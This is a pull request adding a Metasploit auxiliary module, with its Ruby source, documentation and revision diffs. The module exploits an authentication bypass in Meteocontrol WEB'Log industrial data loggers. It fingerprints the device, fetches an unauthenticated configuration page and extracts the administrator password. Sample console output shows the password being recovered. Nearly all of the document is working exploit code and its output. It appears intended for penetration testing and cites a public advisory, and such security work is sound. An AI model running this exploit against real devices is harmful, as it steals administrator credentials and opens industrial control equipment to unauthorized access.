### PR TITLE
Add Meteocontrol Weblog Extract Admin password module

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
+++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
@@ -4,7 +4,7 @@ Note: In some versions, 'Website password' page is renamed or not present. There
 
 ## Verification Steps
 
-1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
+1. Do: ```use auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
 2. Do: ```set RHOSTS [IP]```
 3. Do: ```set RPORT [PORT]```
 4. Do: ```run```
@@ -13,36 +13,6 @@ Note: In some versions, 'Website password' page is renamed or not present. There
 
   ```
 msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
-msf auxiliary(meteocontrol_weblog_extractadmin) > info
-
-       Name: MeteoControl WEBLog Password Extractor
-     Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin
-    License: Metasploit Framework License (BSD)
-       Rank: Normal
-
-Provided by:
-  Karn Ganeshen <KarnGaneshen@gmail.com>
-
-Basic options:
-  Name     Current Setting  Required  Description
-  ----     ---------------  --------  -----------
-  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-  RHOSTS                    yes       The target address range or CIDR identifier
-  RPORT    8080             yes       The target port
-  SSL      false            no        Negotiate SSL/TLS for outgoing connections
-  THREADS  1                yes       The number of concurrent threads
-  VHOST                     no        HTTP server virtual host
-
-Description:
-  This module exploits an authentication bypass vulnerability in 
-  Meteocontrol WEBLog (all models) to extract Administrator password 
-  for the device management portal.
-
-References:
-  https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
-  http://cvedetails.com/cve/2016-2296/
-  http://cvedetails.com/cve/2016-2298/
-
 msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4
 msf auxiliary(meteocontrol_weblog_extractadmin) > run
 

--- a/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
+++ b/documentation/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.md
@@ -1,0 +1,54 @@
+Meteocontrol WEB'Log Data Loggers are affected with an authentication bypass vulnerability. The module exploits this vulnerability to remotely extract Administrator password for the device management portal.
+
+Note: In some versions, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Manual verification will be required in such cases.
+
+## Verification Steps
+
+1. Do: ```auxiliary/scanner/http/meteocontrol_weblog_extractadmin```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+  ```
+msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
+msf auxiliary(meteocontrol_weblog_extractadmin) > info
+
+       Name: MeteoControl WEBLog Password Extractor
+     Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+
+Provided by:
+  Karn Ganeshen <KarnGaneshen@gmail.com>
+
+Basic options:
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                    yes       The target address range or CIDR identifier
+  RPORT    8080             yes       The target port
+  SSL      false            no        Negotiate SSL/TLS for outgoing connections
+  THREADS  1                yes       The number of concurrent threads
+  VHOST                     no        HTTP server virtual host
+
+Description:
+  This module exploits an authentication bypass vulnerability in 
+  Meteocontrol WEBLog (all models) to extract Administrator password 
+  for the device management portal.
+
+References:
+  https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
+  http://cvedetails.com/cve/2016-2296/
+  http://cvedetails.com/cve/2016-2298/
+
+msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 1.2.3.4
+msf auxiliary(meteocontrol_weblog_extractadmin) > run
+
+[+] 1.2.3.4:8080 - Running Meteocontrol WEBlog management portal...
+[*] 1.2.3.4:8080 - Attempting to extract Administrator password...
+[+] 1.2.3.4:8080 - Password is password
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+  ```

--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -15,25 +15,25 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'Meteocontrol WEBlog Password Extractor',
       'Description' => %{
-          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models) to extract Administrator password for the device management portal.
+          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal.
       },
       'References'  =>
         [
-             [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01' ],
-             [ 'CVE', '2016-2296' ],
-             [ 'CVE', '2016-2298' ]
+          ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'],
+          ['CVE', '2016-2296'],
+          ['CVE', '2016-2298']
         ],
       'Author'         =>
         [
-          'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
         ],
-      'License'        => MSF_LICENSE
-    ))
+      'License'        => MSF_LICENSE))
 
     register_options(
-    [
-        Opt::RPORT(8080)	# Application may run on a different port too. Change port accordingly.
-    ], self.class)
+      [
+        Opt::RPORT(8080) # Application may run on a different port too. Change port accordingly.
+      ], self.class
+    )
   end
 
   def run_host(ip)
@@ -50,17 +50,17 @@ class MetasploitModule < Msf::Auxiliary
 
   def is_app_metweblog?
     begin
-      res = send_request_cgi(
-      {
-        'uri'       => '/html/en/index.html',
-        'method'    => 'GET'
+      res = send_request_cgi({
+        'uri'     => '/html/en/index.html',
+        'method'  => 'GET'
       })
+
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
       print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
       return false
     end
 
-    if (res and res.code == 200 and (res.headers['Server'] and res.headers['Server'].include?("IS2 Web Server") or res.body.include?("WEB'log")))
+    if (res && res.code == 200 && (res.headers['Server'] && res.headers['Server'].include?("IS2 Web Server") || res.body.include?("WEB'log")))
       print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...")
       return true
     else
@@ -77,27 +77,27 @@ class MetasploitModule < Msf::Auxiliary
 
     print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...")
     begin
-      res = send_request_cgi(
-      {
-        'uri'       => '/html/en/confAccessProt.html',
-        'method'    => 'GET'
+      res = send_request_cgi({
+          'uri'       => '/html/en/confAccessProt.html',
+          'method'    => 'GET'
       })
 
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
       print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
       return
     end
 
-    if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/)
+    if (res && res.code == 200 && (res.body.include?("szWebAdminPassword") || res.body=~ /Admin Monitoring/))
       get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/)
       admin_password = get_admin_password[1]
       print_good("#{rhost}:#{rport} - Password is #{admin_password}")
       report_cred(
-                ip: rhost,
-                port: rport,
-                service_name: 'Meteocontrol WEBlog Management Portal',
-                password: admin_password,
-                proof: res.body)
+        ip: rhost,
+        port: rport,
+        service_name: 'Meteocontrol WEBlog Management Portal',
+        password: admin_password,
+        proof: res.body
+      )
     else
       # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases.
       print_error("Password not found. Check login manually.")

--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -1,0 +1,133 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Meteocontrol WEBlog Password Extractor',
+      'Description' => %{
+          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models). This vulnerability allows extracting Administrator password for the device management portal.
+      },
+      'References'  =>
+        [
+             [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01' ],
+             [ 'CVE', '2016-2296' ],
+             [ 'CVE', '2016-2298' ]
+        ],
+      'Author'         =>
+        [
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+    [
+        Opt::RPORT(8080)	# Application may run on a different port too. Change port accordingly.
+    ], self.class)
+  end
+
+  def run_host(ip)
+    unless is_app_metweblog?
+      return
+    end
+
+    do_extract
+  end
+
+  #
+  # Check if App is Meteocontrol WEBlog
+  #
+
+  def is_app_metweblog?
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/html/en/index.html',
+        'method'    => 'GET'
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res and res.code == 200 and (res.headers['Server'] and res.headers['Server'].include?("IS2 Web Server") or res.body.include?("WEB'log")))
+      print_good("#{rhost}:#{rport} - Running Meteocontrol WEBlog management portal...")
+      return true
+    else
+      print_error("#{rhost}:#{rport} - Application does not appear to be Meteocontrol WEBlog. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Extract Administrator Password
+  #
+
+  def do_extract()
+
+    print_status("#{rhost}:#{rport} - Attempting to extract Administrator password...")
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/html/en/confAccessProt.html',
+        'method'    => 'GET'
+      })
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return
+    end
+
+    if (res and res.code == 200 and res.body.include?("szWebAdminPassword") or res.body=~ /Admin Monitoring/)
+      get_admin_password = res.body.match(/name="szWebAdminPassword" value="(.*?)"/)
+      admin_password = get_admin_password[1]
+      print_good("#{rhost}:#{rport} - Password is #{admin_password}")
+      report_cred(
+                ip: rhost,
+                port: rport,
+                service_name: 'Meteocontrol WEBlog Management Portal',
+                password: admin_password,
+                proof: res.body)
+    else
+      # In some models, 'Website password' page is renamed or not present. Therefore, password can not be extracted. Try login manually in such cases.
+      print_error("Password not found. Check login manually.")
+    end
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: Time.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+end

--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description' => %{
           This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog appliances (software version < May 2016 release) to extract Administrator password for the device management portal.
       },
-      'References' => 
+      'References' =>
         [
           ['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01'],
           ['CVE', '2016-2296'],

--- a/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
+++ b/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'Meteocontrol WEBlog Password Extractor',
       'Description' => %{
-          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models). This vulnerability allows extracting Administrator password for the device management portal.
+          This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models) to extract Administrator password for the device management portal.
       },
       'References'  =>
         [


### PR DESCRIPTION
This module exploits an authentication bypass vulnerability in Meteocontrol WEBLog (all models). This vulnerability allows extracting Administrator password for the device management portal.

## Verification

```
msf > use auxiliary/scanner/http/meteocontrol_weblog_extractadmin
msf auxiliary(meteocontrol_weblog_extractadmin) > info

       Name: MeteoControl WEBLog Password Extractor
     Module: auxiliary/scanner/http/meteocontrol_weblog_extractadmin
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Karn Ganeshen <KarnGaneshen@gmail.com>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target address range or CIDR identifier
  RPORT    8080             yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  THREADS  1                yes       The number of concurrent threads
  VHOST                     no        HTTP server virtual host

Description:
  This module exploits an authentication bypass vulnerability in 
  Meteocontrol WEBLog (all models). This vulnerability allows 
  extracting Administrator password for the device management portal.

References:
  https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
  http://cvedetails.com/cve/2016-2296/
  http://cvedetails.com/cve/2016-2298/

msf auxiliary(meteocontrol_weblog_extractadmin) > set rhosts 10.10.10.20
msf auxiliary(meteocontrol_weblog_extractadmin) > run

[+] 10.10.10.20:8080 - Running Meteocontrol WEBlog management portal...
[*] 10.10.10.20:8080 - Attempting to extract Administrator password...
[+] 10.10.10.20:8080 - Password is password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

msftidy run is clean.